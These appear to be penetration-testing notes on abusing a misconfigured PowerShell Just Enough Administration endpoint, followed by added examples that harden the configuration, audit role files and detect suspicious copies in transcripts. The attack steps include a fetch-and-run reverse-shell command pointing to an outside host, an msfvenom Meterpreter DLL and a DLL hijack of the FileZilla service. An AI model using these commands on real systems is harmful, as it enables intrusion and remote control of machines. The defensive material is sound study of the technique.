Just Enough Administration (JEA)

> Windows Server 2016; needs WinRM enabled on the endpoint to accept user connections; enforced by PowerShell, not Active Directory; depends on PS-Remoting

Prerequisites:
1. performed lateral movement & gained access to multiple systems & users
(2. obtained a password/hash to RDP)

A misconfigured JEA endpoint might grant extensive permissions that attackers could exploit.

Enumeration

@compromised host
#find the PS history file path & view the command history
(Get-PSReadlineOption).HistorySavePath

type C:\Users\mary\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

#replicate the remote access command that was found in the history file
Enter-PSSession -ComputerName files02 -ConfigurationName j_fs02
@remote session shell
##in remote session @ new powershell window##
#enum in remote session
whoami

[System.Security.Principal.WindowsIdentity]::GetCurrent().Name

$ExecutionContext.SessionState.LanguageMode

#look for non-default commands, e.g. Copy-Item
Get-Command
#the commands available to us will be executed with administrative privileges on the machine

Default commands that normally work in PowerShell do not work here.

The -ConfigurationName flag is not standard for a typical WinRM connection.

Based on the output, we are operating in NoLanguage mode (JEA config SessionType: RestrictedRemoteServer).

If the SessionType in JEA is set to Default, we would operate in FullLanguage mode and be able to create our own functions. With a JEA configuration, this essentially means full administrative access to the target.

function my-function { powershell -nop -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.129.114/rev.ps1')" }

my-function

#basic JEA PS command restriction bypass:
& {whoami}
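The two situations described above come straight from the endpoint's session configuration: SessionType Default gives FullLanguage mode, RestrictedRemoteServer gives NoLanguage mode, and the role capability decides which cmdlets (and which parameter values) are visible. The following is an added example, not code from the original notes, that writes a weak and a hardened variant of such a configuration side by side. The endpoint name j_fs02 and the share path C:\shares\home are taken from the notes; the group CORP\FileOps, the role name FileOpsRole and the directory C:\JEA are assumptions.

```powershell
# Added example (not from the original notes): weak vs hardened JEA configuration
# for an endpoint like j_fs02. CORP\FileOps, FileOpsRole and C:\JEA are assumptions.

$base    = 'C:\JEA'
$roleDir = "$base\RoleCapabilities"
New-Item -ItemType Directory -Path $roleDir -Force | Out-Null

# --- Weak role: Copy-Item is visible with no restriction on Path/Destination,
# so the virtual admin account can write anywhere on the box.
New-PSRoleCapabilityFile -Path "$roleDir\FileOpsRole-weak.psrc" `
    -VisibleCmdlets 'Copy-Item', 'Get-ChildItem'

# --- Weak session: SessionType Default = FullLanguage mode; a connected user can
# define functions and reach the whole runspace as the RunAs virtual account.
New-PSSessionConfigurationFile -Path "$base\j_fs02-weak.pssc" `
    -SessionType Default `
    -RunAsVirtualAccount `
    -RoleDefinitions @{
        'CORP\FileOps' = @{ RoleCapabilityFiles = "$roleDir\FileOpsRole-weak.psrc" }
    }

# --- Hardened role: the same cmdlets, but ValidatePattern pins both the source
# and the destination of Copy-Item to the user share.
New-PSRoleCapabilityFile -Path "$roleDir\FileOpsRole.psrc" -VisibleCmdlets @(
    @{
        Name       = 'Copy-Item'
        Parameters = @(
            @{ Name = 'Path';        ValidatePattern = '^C:\\shares\\home\\' },
            @{ Name = 'Destination'; ValidatePattern = '^C:\\shares\\home\\' }
        )
    },
    'Get-ChildItem'
)

# --- Hardened session: RestrictedRemoteServer = NoLanguage mode, and every
# session is transcribed so the commands run through the endpoint are auditable.
New-PSSessionConfigurationFile -Path "$base\j_fs02-hardened.pssc" `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{
        'CORP\FileOps' = @{ RoleCapabilityFiles = "$roleDir\FileOpsRole.psrc" }
    }

# Both files must parse before registration; Test-PSSessionConfigurationFile
# returns $false (and writes the parse error) otherwise.
foreach ($f in 'j_fs02-weak.pssc', 'j_fs02-hardened.pssc') {
    $cfg = Import-PowerShellDataFile -Path "$base\$f"
    '{0,-22} SessionType={1,-24} valid={2}' -f $f, $cfg.SessionType,
        (Test-PSSessionConfigurationFile -Path "$base\$f")
}

# Registration is done on the endpoint as an administrator, e.g.:
# Register-PSSessionConfiguration -Name j_fs02 -Path "$base\j_fs02-hardened.pssc" -Force
```

Inside a session built from the hardened file, $ExecutionContext.SessionState.LanguageMode reports NoLanguage, function definitions are rejected, and Copy-Item refuses any -Destination outside C:\shares\home\, which removes the write-into-a-service-directory path used later in these notes.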

Abuse available non-default command

##in remote session @ new powershell window##
#the writable destination (-Destination) was also visible in the command history above
Copy-Item -Path 'C:\Windows\System32\drivers\etc\hosts' -Destination 'C:\shares\home\mary'

##in originating compromised host##
type \\files02\home$\mary\hosts

We can add a malicious payload to the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ folder. By default, anything stored in that folder is executed in the context of the user logging in. However, this does not guarantee high privileges, and the chances that someone will log in to the server are rather small.

Another option is to attempt a form of DLL hijacking that makes use of the DLL search order in Windows.

  1. The directory from which the application is loaded (e.g. C:\Program Files\application)

  2. The system directory (C:\Windows\System32)

  3. The 16-bit system directory

  4. The Windows directory

  5. The current directory

  6. Directories that are listed in the PATH environment variable

If we can find out which non-existent DLLs Windows is attempting to load from the directory where the service is loaded, we should be able to add our own DLL containing a payload.

Copy-Item running with administrative privileges can replace any existing DLL that a service loads.

In a JEA setting, numerous PowerShell commands can potentially bypass the established restrictions, posing significant security risks. For instance, Invoke-Expression, Start-Process, and Invoke-Command are just a few that should be avoided due to their potential misuse.
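A defender can check for these commands before an endpoint ever goes live, because JEA's allow-list is just the VisibleCmdlets / VisibleFunctions entries of the role capability files. The following is an added example, not code from the original notes, that audits a .psrc file for the cmdlets named above, for wildcards, and for file-moving cmdlets whose -Destination is not pinned by a validator. The deny list, the function name Test-JeaRoleCapability and the sample .psrc content are all constructed for the demonstration.

```powershell
# Added example (not from the original notes): audit a JEA role capability (.psrc)
# for entries that undo the restriction. Deny list and sample file are constructed.

$denyList = 'Invoke-Expression', 'Start-Process', 'Invoke-Command', 'New-Object',
            'Add-Type', 'Set-Content', 'Out-File', 'Import-Module'
# File-moving cmdlets are only acceptable when -Destination is pinned by a validator
$pathCmdlets = 'Copy-Item', 'Move-Item', 'Rename-Item'

function Test-JeaRoleCapability {
    param([Parameter(Mandatory)][string]$Path)
    $rc = Import-PowerShellDataFile -Path $Path
    $findings = @()
    foreach ($entry in @($rc.VisibleCmdlets) + @($rc.VisibleFunctions)) {
        if ($null -eq $entry) { continue }
        # An entry is either a plain name string or a hashtable with Name/Parameters
        $name   = if ($entry -is [hashtable]) { $entry.Name } else { [string]$entry }
        $params = if ($entry -is [hashtable]) { @($entry.Parameters) } else { @() }

        if ($name -match '[\*\?]') {
            $findings += "wildcard '$name' exposes every matching command"
        }
        if ($name -in $denyList) {
            $findings += "'$name' allows arbitrary code execution or file writes"
        }
        if ($name -in $pathCmdlets) {
            $dest = $params | Where-Object { $_.Name -eq 'Destination' }
            if (-not $dest -or -not ($dest.ValidatePattern -or $dest.ValidateSet)) {
                $findings += "'$name' has no ValidatePattern/ValidateSet on -Destination"
            }
        }
    }
    [pscustomobject]@{ File = $Path; Findings = $findings }
}

# Constructed sample: the kind of role the notes ran into (unrestricted Copy-Item),
# plus an explicit code-execution cmdlet and a wildcard function entry.
$sample = Join-Path $env:TEMP 'j_fs02-sample.psrc'
@'
@{
    VisibleCmdlets   = 'Copy-Item', 'Get-ChildItem', 'Invoke-Expression'
    VisibleFunctions = 'Get-*'
}
'@ | Set-Content -Path $sample

(Test-JeaRoleCapability -Path $sample).Findings
```

On the constructed sample this reports three findings: Copy-Item with no validator on -Destination, Invoke-Expression on the deny list, and the Get-* wildcard. Run it over every .psrc under the RoleCapabilities folders of the modules on $env:PSModulePath (and any path named in RoleCapabilityFiles of the .pssc) to cover all roles an endpoint can map to.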

Abusing FileZilla

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.48.4 LPORT=443 -a x64 --platform windows -f dll > msasn1.dll
#place the malicious DLL in \\files02\home$\mary\ from the originating host
Enter-PSSession -ComputerName files02 -ConfigurationName j_fs02

#in remote session shell#
Copy-Item C:\shares\home\mary\msasn1.dll -Destination "C:\Program Files\FileZilla Server\msasn1.dll"
#wait for a reboot to restart the service so it loads the tampered DLL
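When the endpoint has a TranscriptDirectory configured, the copy above leaves a record: JEA transcripts log each command invocation together with its bound parameters. The following is an added example, not code from the original notes, that scans such transcripts for Copy-Item/Move-Item writes into directories that services and the OS load DLLs from. The transcript excerpt is constructed in the CommandInvocation/ParameterBinding format JEA writes; the function name Find-JeaSuspiciousCopy and the list of sensitive roots are assumptions.

```powershell
# Added example (not from the original notes): detection over JEA transcripts for
# file copies into service/system directories. Sample transcript is constructed.

$sensitiveRoots = @('C:\Program Files', 'C:\Program Files (x86)', 'C:\Windows')

function Find-JeaSuspiciousCopy {
    param([Parameter(Mandatory)][string]$TranscriptDirectory)
    foreach ($file in Get-ChildItem -Path $TranscriptDirectory -Filter *.txt -File) {
        $lines = @(Get-Content -Path $file.FullName)
        $user  = ($lines | Where-Object { $_ -like 'Username:*' } |
                  Select-Object -First 1) -replace '^Username:\s*', ''
        for ($i = 0; $i -lt $lines.Count; $i++) {
            if ($lines[$i] -notmatch 'CommandInvocation\((Copy|Move)-Item\)') { continue }
            # Parameter bindings follow the invocation line until the next command
            $dest = $null
            for ($j = $i + 1; $j -lt $lines.Count -and $lines[$j] -match 'ParameterBinding'; $j++) {
                if ($lines[$j] -match 'name="Destination";\s*value="([^"]+)"') { $dest = $Matches[1] }
            }
            if ($dest -and ($sensitiveRoots | Where-Object { $dest -like "$_\*" })) {
                [pscustomobject]@{
                    Transcript  = $file.Name
                    User        = $user
                    Destination = $dest
                    Reason      = 'write into a service/system directory from a JEA session'
                }
            }
        }
    }
}

# Constructed transcript excerpt: one benign listing and the copy from the notes
$dir = Join-Path $env:TEMP 'JEATranscripts-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
@'
**********************
Windows PowerShell transcript start
Username: CORP\mary
RunAs User: WinRM Virtual Users\WinRM VA_1_CORP_mary
Configuration Name: j_fs02
Machine: FILES02 (Microsoft Windows NT 10.0.14393.0)
**********************
PS>CommandInvocation(Copy-Item): "Copy-Item"
>> ParameterBinding(Copy-Item): name="Path"; value="C:\shares\home\mary\msasn1.dll"
>> ParameterBinding(Copy-Item): name="Destination"; value="C:\Program Files\FileZilla Server\msasn1.dll"
PS>CommandInvocation(Get-ChildItem): "Get-ChildItem"
>> ParameterBinding(Get-ChildItem): name="Path"; value="C:\shares\home\mary"
'@ | Set-Content -Path (Join-Path $dir 'sample.txt')

Find-JeaSuspiciousCopy -TranscriptDirectory $dir | Format-Table -AutoSize
```

On the constructed sample only the Copy-Item into C:\Program Files\FileZilla Server\ is reported; the Get-ChildItem under the user share is not. Because the transcript records the connecting user rather than the virtual account, the hit can be tied back to the account whose credentials were used, and the same scan can be scheduled against the TranscriptDirectory of every registered JEA endpoint.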
